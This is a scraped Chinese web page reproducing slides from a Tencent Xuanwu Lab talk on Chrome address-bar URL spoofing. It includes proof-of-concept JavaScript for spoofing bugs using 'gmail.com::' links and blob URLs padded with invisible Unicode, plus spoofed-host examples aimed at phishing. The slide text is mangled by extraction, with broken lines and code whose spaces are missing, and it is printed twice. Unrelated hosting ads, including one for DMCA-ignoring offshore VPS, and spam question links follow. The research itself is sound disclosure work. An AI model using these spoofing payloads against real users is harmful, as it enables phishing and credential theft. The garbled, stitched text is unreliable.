浏览器地址栏之困
搜狗浏览器收藏夹在哪 时间:2021-02-23 阅读:()
腾讯玄武实验室徐少培(@xisigr)腾讯玄武实验室研究员Web安全研究浏览器安全研究《Web前端黑客技术揭秘》作者联系方式weibo.
com/xisigrxisigr.
comxisigr@gmail.
comWerecognizethattheaddressbaristheonlyreliablesecurityindicatorinmodernbrowsers.
--GoogleSecurityTeam[1][1]https://www.
google.
com/about/appsecurity/reward-program/HTTPS:网址左边的绿色符号对你意味着什么HTTP:网址左边的白色符号对你意味着什么[1]https://www.
usenix.
org/conference/soups2016/technical-sessions/presentation/porter-feltURL标准目前由whatwg维护[1]URL经过20多年的发展其定义在不断扩大,很多现代的主题也开始被URL规范所覆盖.
将URI[RFC3986][2]和IRI[RFC3987][3]与现代接轨,并逐步淘汰.
使得对'网址'一词进行标准化.
URL/URI/IRIURL的解析应该向HTML解析一样坚固[1]https://url.
spec.
whatwg.
org/[2]https://tools.
ietf.
org/html/rfc3986[3]https://tools.
ietf.
org/html/rfc3987伪造了Web最基本的安全边界,起源(orgin)Orgin=scheme+hostname+port但人们(包括开发人员)往往不了解起源的概念,而更倾向于理解主机(hostname)的概念.
UI简化:忽略scheme(或图标替换)/port(默认80)可伪造的主机包括什么域名[RFC1034]IP:IPv4[RFC791]/IPv6[RFC4291]只要伪造了主机,就可以认为这是一个URLSpoof漏洞.
URL中的任何一个部分,都有可能成为触发URLSpoof漏洞的攻击向量.
https://login.
your-bank.
com.
evil.
com/login.
your-bank.
com漏洞介绍漏洞名称ChromeAddressBarURLSpoofingOnIOS受影响产品Chromepayload="keypayload";functionpwned(){vart=window.
open('','new');t.
document.
write(atob(payload));}clickmekeypayloadSpoofvarlink=document.
createElement('a');link.
href='https://gmail.
com::';document.
body.
appendChild(link);link.
click();keypayload发生了什么①,跳转到一个新页面时,chrome允许对'https://gmail.
com::'进行加载.
这是错误的开始,加载了一个无效地址,并未对无效地址做任何处理②,页面开始加载'https://gmail.
com::',因加载的是一个无效的地址,于是地址栏处于一个挂起的状态(pendingentry).
③,当内容开始返回时,调用'about:blank',但此时chrome还处于一个挂起状态('https://gmail.
com::'),并且把'https://gmail.
com::'作为了最终的提交地址.
④,页面加载完毕.
一个URLSpoof漏洞诞生了.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofingwithBlob-URLs受影响产品GoogleChromefunctionpwned(){vart=window.
open('','new');t.
document.
write("phishingpagegoogle");t.
stop();}clickme1clickme2keypayload(1)blob:http://www.
google.
com%EF%BE%A0…………@xisigr.
com//UnicodeU+FFA0(2)blob:http://www.
google.
com…………@xisigr.
com//空格keypayload发生了什么Chrome渲染了Blob-URLs的用户名和密码部分,这是极其危险的.
一个URL的用户名和密码不应该被渲染,因为它们可以被误认为是一个URL的主机.
https://examplecorp.
com@attacker.
example/Unicode字符(比如U+0020、U+FFA0),在Chrome地址栏中将显示空白.
大量的空白字符覆盖了真实的主机.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofing受影响产品ChromeRightClickkeypayload(1)google.
com::(2)www.
google.
com::/urlq=http%3A%2F%2Fxisigr.
com%2Ftest%2Fspoof%2Fchrome%2F3.
html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cwkeypayload发生了什么通过右键在新窗口打开页面,Chrome允许加载(google.
com::)一个无效的地址.
加载(google.
com)返回页面,并将(google.
com:)作为最后提交地址.
之后的重定向不会触发(google.
com:)被更新加载完毕.
一个URLSpoof漏洞诞生了.
地址栏之困浏览器地址栏是个矛盾体,它提供两个相互竞争的角色:你在哪和你要去哪.
它只能显示其中的一个.
而地址栏恰是困于这两个角色的转换之中.
深刻理解地址栏之困,即是挖掘URLSpoof漏洞的核心奥义.
公众号和微博"腾讯玄武实验室"每天推送国际最新安全技术资料
com/xisigrxisigr.
comxisigr@gmail.
comWerecognizethattheaddressbaristheonlyreliablesecurityindicatorinmodernbrowsers.
--GoogleSecurityTeam[1][1]https://www.
google.
com/about/appsecurity/reward-program/HTTPS:网址左边的绿色符号对你意味着什么HTTP:网址左边的白色符号对你意味着什么[1]https://www.
usenix.
org/conference/soups2016/technical-sessions/presentation/porter-feltURL标准目前由whatwg维护[1]URL经过20多年的发展其定义在不断扩大,很多现代的主题也开始被URL规范所覆盖.
将URI[RFC3986][2]和IRI[RFC3987][3]与现代接轨,并逐步淘汰.
使得对'网址'一词进行标准化.
URL/URI/IRIURL的解析应该向HTML解析一样坚固[1]https://url.
spec.
whatwg.
org/[2]https://tools.
ietf.
org/html/rfc3986[3]https://tools.
ietf.
org/html/rfc3987伪造了Web最基本的安全边界,起源(orgin)Orgin=scheme+hostname+port但人们(包括开发人员)往往不了解起源的概念,而更倾向于理解主机(hostname)的概念.
UI简化:忽略scheme(或图标替换)/port(默认80)可伪造的主机包括什么域名[RFC1034]IP:IPv4[RFC791]/IPv6[RFC4291]只要伪造了主机,就可以认为这是一个URLSpoof漏洞.
URL中的任何一个部分,都有可能成为触发URLSpoof漏洞的攻击向量.
https://login.
your-bank.
com.
evil.
com/login.
your-bank.
com漏洞介绍漏洞名称ChromeAddressBarURLSpoofingOnIOS受影响产品Chromepayload="keypayload";functionpwned(){vart=window.
open('','new');t.
document.
write(atob(payload));}clickmekeypayloadSpoofvarlink=document.
createElement('a');link.
href='https://gmail.
com::';document.
body.
appendChild(link);link.
click();keypayload发生了什么①,跳转到一个新页面时,chrome允许对'https://gmail.
com::'进行加载.
这是错误的开始,加载了一个无效地址,并未对无效地址做任何处理②,页面开始加载'https://gmail.
com::',因加载的是一个无效的地址,于是地址栏处于一个挂起的状态(pendingentry).
③,当内容开始返回时,调用'about:blank',但此时chrome还处于一个挂起状态('https://gmail.
com::'),并且把'https://gmail.
com::'作为了最终的提交地址.
④,页面加载完毕.
一个URLSpoof漏洞诞生了.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofingwithBlob-URLs受影响产品GoogleChromefunctionpwned(){vart=window.
open('','new');t.
document.
write("phishingpagegoogle");t.
stop();}clickme1clickme2keypayload(1)blob:http://www.
google.
com%EF%BE%A0…………@xisigr.
com//UnicodeU+FFA0(2)blob:http://www.
google.
com…………@xisigr.
com//空格keypayload发生了什么Chrome渲染了Blob-URLs的用户名和密码部分,这是极其危险的.
一个URL的用户名和密码不应该被渲染,因为它们可以被误认为是一个URL的主机.
https://examplecorp.
com@attacker.
example/Unicode字符(比如U+0020、U+FFA0),在Chrome地址栏中将显示空白.
大量的空白字符覆盖了真实的主机.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofing受影响产品ChromeRightClickkeypayload(1)google.
com::(2)www.
google.
com::/urlq=http%3A%2F%2Fxisigr.
com%2Ftest%2Fspoof%2Fchrome%2F3.
html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cwkeypayload发生了什么通过右键在新窗口打开页面,Chrome允许加载(google.
com::)一个无效的地址.
加载(google.
com)返回页面,并将(google.
com:)作为最后提交地址.
之后的重定向不会触发(google.
com:)被更新加载完毕.
一个URLSpoof漏洞诞生了.
地址栏之困浏览器地址栏是个矛盾体,它提供两个相互竞争的角色:你在哪和你要去哪.
它只能显示其中的一个.
而地址栏恰是困于这两个角色的转换之中.
深刻理解地址栏之困,即是挖掘URLSpoof漏洞的核心奥义.
公众号和微博"腾讯玄武实验室"每天推送国际最新安全技术资料
打开海外主机域名商出现"Attention Required"原因和解决
最近发现一个比较怪异的事情,在访问和登录大部分国外主机商和域名商的时候都需要二次验证。常见的就是需要我们勾选判断是不是真人。以及比如在刚才要访问Namecheap检查前几天送给网友域名的账户域名是否转出的,再次登录网站的时候又需要人机验证。这里有看到"Attention Required"的提示。我们只能手工选择按钮,然后根据验证码进行选择合适的标记。这次我要选择的是船的标识,每次需要选择三个,一...
ParkinHost:俄罗斯离岸主机,抗投诉VPS,200Mbps带宽/莫斯科CN2线路/不限流量/无视DMCA/55折促销26.4欧元 /年起
外贸主机哪家好?抗投诉VPS哪家好?无视DMCA。ParkinHost今年还没有搞过促销,这次parkinhost俄罗斯机房上新服务器,母机采用2个E5-2680v3处理器、128G内存、RAID10硬盘、2Gbps上行线路。具体到VPS全部200Mbps带宽,除了最便宜的套餐限制流量之外,其他的全部是无限流量VPS。ParkinHost,成立于 2013 年,印度主机商,隶属于 DiggDigi...
CloudCone:$17.99/年KVM-1GB/50GB/1TB/洛杉矶MC机房
CloudCone在月初发了个邮件,表示上新了一个系列VPS主机,采用SSD缓存磁盘,支持下单购买额外的CPU、内存和硬盘资源,最低年付17.99美元起。CloudCone成立于2017年,提供VPS和独立服务器租用,深耕洛杉矶MC机房,最初提供按小时计费随时退回,给自己弄回一大堆中国不能访问的IP,现在已经取消了随时删除了,不过他的VPS主机价格不贵,支持购买额外IP,还支持购买高防IP。下面列...
搜狗浏览器收藏夹在哪为你推荐
-
打开网页出现错误网页出现错误怎么解决?要最简单的那种百度抢票浏览器百度浏览器怎么抢票?百度抢票浏览器现在火车票越来越难买了,新版百度手机浏览器,除了抢票外,还有什么其他功能吗?不兼容软件和电脑不兼容会怎样?iphone越狱后怎么恢复苹果越狱后如何恢复蘑菇街美丽说蘑菇街、美丽说这类网站前期是怎么推广的?人人逛街包公免费逛街打一成语idc前线永恒之塔内侧 删档吗 ?2012年正月十五2012年正月十五上午9点27分出生的女孩儿五行缺什么,命怎么样iphone6上市时间iphone6什么时候上市,价格是多少?